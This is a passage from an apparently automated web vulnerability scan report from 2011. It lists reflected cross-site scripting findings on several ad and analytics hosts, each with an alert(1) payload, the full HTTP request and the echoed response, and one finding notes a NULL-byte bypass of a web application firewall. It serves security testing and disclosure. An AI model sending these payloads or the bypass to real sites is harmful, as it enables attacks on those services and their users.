Date: Mon, 13 Jun 2011 11:01:22 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7f78f6<script>alert(1)</script>46dbba33e76", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.102. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 9a43a<script>alert(1)</script>89e036b59b8 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=9a43a<script>alert(1)</script>89e036b59b8&tm=487641 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 11:01:33 GMT
Date: Mon, 13 Jun 2011 11:01:33 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"9a43a<script>alert(1)</script>89e036b59b8", c16:"", r:""});



4.103. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 74de2<script>alert(1)</script>f5c8345fe6a was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=596488874de2<script>alert(1)</script>f5c8345fe6a&c3=2&c4=&c5=&c6=&c15=&tm=487641 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 11:01:24 GMT
Date: Mon, 13 Jun 2011 11:01:24 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"596488874de2<script>alert(1)</script>f5c8345fe6a", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.104. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload eae72<script>alert(1)</script>592488c2035 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2eae72<script>alert(1)</script>592488c2035&c4=&c5=&c6=&c15=&tm=487641 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 11:01:24 GMT
Date: Mon, 13 Jun 2011 11:01:24 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2eae72<script>alert(1)</script>592488c2035", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.105. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 390ca<script>alert(1)</script>b602141498d was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=390ca<script>alert(1)</script>b602141498d&c5=&c6=&c15=&tm=487641 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 11:01:31 GMT
Date: Mon, 13 Jun 2011 11:01:31 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"390ca<script>alert(1)</script>b602141498d", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.106. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 1963a<script>alert(1)</script>ee868e885cc was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=1963a<script>alert(1)</script>ee868e885cc&c6=&c15=&tm=487641 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 11:01:33 GMT
Date: Mon, 13 Jun 2011 11:01:33 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"1963a<script>alert(1)</script>ee868e885cc", c6:"", c10:"", c15:"", c16:"", r:""});



4.107. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 9a60f<script>alert(1)</script>a2e90c8fffe was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=9a60f<script>alert(1)</script>a2e90c8fffe&c15=&tm=487641 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 11:01:33 GMT
Date: Mon, 13 Jun 2011 11:01:33 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"9a60f<script>alert(1)</script>a2e90c8fffe", c10:"", c15:"", c16:"", r:""});



4.108. http://ct.buzzfeed.com/wd/UserWidget [or parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ct.buzzfeed.com
Path:   /wd/UserWidget

Issue detail

The value of the or request parameter is copied into the HTML document as plain text between tags. The payload 789e4<script>alert(1)</script>93295794946 was submitted in the or parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wd/UserWidget?u=ugo&to=1&or=vb789e4<script>alert(1)</script>93295794946&wid=1&cb=1307963919106 HTTP/1.1
Host: ct.buzzfeed.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/tv/game-of-thrones-baelor-preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=ISO-8859-1
Date: Mon, 13 Jun 2011 11:24:15 GMT
Server: lighttpd bf1
Content-Length: 567

bless({
"-file" => "lib/buzzfeed/wd/controller/UserWidget.pm",
"-line" => 143,
"-package" => "buzzfeed::wd::controller::UserWidget",
"-text" => "unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb789e4<script>alert(1)</script>93295794946&wid=1&to=1&u=ugo - Internal Server Error",
}, "Error::Simple")

unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb789e4<script>
...[SNIP]...

4.109. http://ct.buzzfeed.com/wd/UserWidget [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ct.buzzfeed.com
Path:   /wd/UserWidget

Issue detail

The value of the u request parameter is copied into the HTML document as plain text between tags. The payload d39fa<script>alert(1)</script>d7d3318643e was submitted in the u parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wd/UserWidget?u=ugod39fa<script>alert(1)</script>d7d3318643e&to=1&or=vb&wid=1&cb=1307963919106 HTTP/1.1
Host: ct.buzzfeed.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/tv/game-of-thrones-baelor-preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=ISO-8859-1
Date: Mon, 13 Jun 2011 11:24:14 GMT
Server: lighttpd bf2
Content-Length: 567

bless({
"-file" => "lib/buzzfeed/wd/controller/UserWidget.pm",
"-line" => 143,
"-package" => "buzzfeed::wd::controller::UserWidget",
"-text" => "unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb&wid=1&to=1&u=ugod39fa<script>alert(1)</script>d7d3318643e - Internal Server Error",
}, "Error::Simple")

unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb&wid=1&to=1&u=ugod39fa<script>
...[SNIP]...

4.110. http://d.chango.com/collector/admeldpixel [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.chango.com
Path:   /collector/admeldpixel

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 177fe'%3balert(1)//07ba58728ca was submitted in the admeld_adprovider_id parameter. This input was echoed as 177fe';alert(1)//07ba58728ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /collector/admeldpixel?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=333177fe'%3balert(1)//07ba58728ca&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: d.chango.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=59006706.1305747445.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=59006706.1028050991.1305747445.1305747445.1305747445.1; _t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4

Response

HTTP/1.1 200 OK
Content-Length: 155
Server: Chango RTB Server
Etag: "49c4a308dfe65dbd3ac4e7c0af8b7d2a30dd4888"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Set-Cookie: _t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4; Domain=chango.com; expires=Thu, 10 Jun 2021 11:23:46 GMT; Path=/
Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Mon, 20 Jun 2011 11:23:46 GMT; Path=/
Connection: close

(new Image()).src='http://tag.admeld.com/match?admeld_adprovider_id=333177fe';alert(1)//07ba58728ca&external_user_id=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4';

4.111. http://d.chango.com/collector/admeldpixel [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.chango.com
Path:   /collector/admeldpixel

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72cb2'%3balert(1)//4971401eda9 was submitted in the admeld_callback parameter. This input was echoed as 72cb2';alert(1)//4971401eda9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /collector/admeldpixel?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=333&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match72cb2'%3balert(1)//4971401eda9 HTTP/1.1
Host: d.chango.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=59006706.1305747445.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=59006706.1028050991.1305747445.1305747445.1305747445.1; _t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4

Response

HTTP/1.1 200 OK
Content-Length: 155
Server: Chango RTB Server
Etag: "98f631aadac39f8db83e9b1ed3f92a6971c57a7c"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Set-Cookie: _t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4; Domain=chango.com; expires=Thu, 10 Jun 2021 11:23:53 GMT; Path=/
Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Mon, 20 Jun 2011 11:23:53 GMT; Path=/
Connection: close

(new Image()).src='http://tag.admeld.com/match72cb2';alert(1)//4971401eda9?admeld_adprovider_id=333&external_user_id=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4';

4.112. http://d.chango.com/collector/admeldpixel [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.chango.com
Path:   /collector/admeldpixel

Issue detail

The value of the admeld_callback request parameter is copied into the HTML document as plain text between tags. The payload ee556<script>alert(1)</script>f3ee7f5ea64 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /collector/admeldpixel?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=333&admeld_call_type=js&admeld_callback=ee556<script>alert(1)</script>f3ee7f5ea64 HTTP/1.1
Host: d.chango.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=59006706.1305747445.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=59006706.1028050991.1305747445.1305747445.1305747445.1; _t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4

Response

HTTP/1.1 200 OK
Content-Length: 141
Server: Chango RTB Server
Etag: "31a35ca3fcea637a6e5e79801983bd200a0b22ba"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Set-Cookie: _t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4; Domain=chango.com; expires=Thu, 10 Jun 2021 11:23:59 GMT; Path=/
Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Mon, 20 Jun 2011 11:23:59 GMT; Path=/
Connection: close

(new Image()).src='ee556<script>alert(1)</script>f3ee7f5ea64?admeld_adprovider_id=333&external_user_id=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4';

4.113. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-407/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25201'%3balert(1)//a92075ae1b6 was submitted in the $ parameter. This input was echoed as 25201';alert(1)//a92075ae1b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-407/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=13&d=14&q=&$=25201'%3balert(1)//a92075ae1b6&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:25201';alert(1)//a92075ae1b6;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:49 GMT;path=/;domain=.zedo.com;
ETag: "2802d0e-87f1-4a4a580e6a180"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=63
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:49 GMT
Content-Length: 2437
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',25201';alert(1)//a92075ae1b6';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,25201';alert(1)//a92075ae1b6;z="+Math.random();}

if(zzuid=='unknown')zzuid='lYrOTcGt89Yz1ao6zwEmLiof~051411';

var zzhasA
...[SNIP]...

4.114. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-407/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60ec7"%3balert(1)//f012bdbb2c2 was submitted in the $ parameter. This input was echoed as 60ec7";alert(1)//f012bdbb2c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-407/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=13&d=14&q=&$=60ec7"%3balert(1)//f012bdbb2c2&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:60ec7";alert(1)//f012bdbb2c2;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:48 GMT;path=/;domain=.zedo.com;
ETag: "2802d0e-87f1-4a4a580e6a180"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=64
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:48 GMT
Content-Length: 2437
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',60ec7";alert(1)//f012bdbb2c2';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,60ec7";alert(1)//f012bdbb2c2;z="+Math.random();}

if(zzuid=='unknown')zzuid='lYrOTcGt89Yz1ao6zwEmLiof~051411';

var zzhasAd=undefined;


...[SNIP]...

4.115. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-407/d3/jsc/fm.js

Issue detail

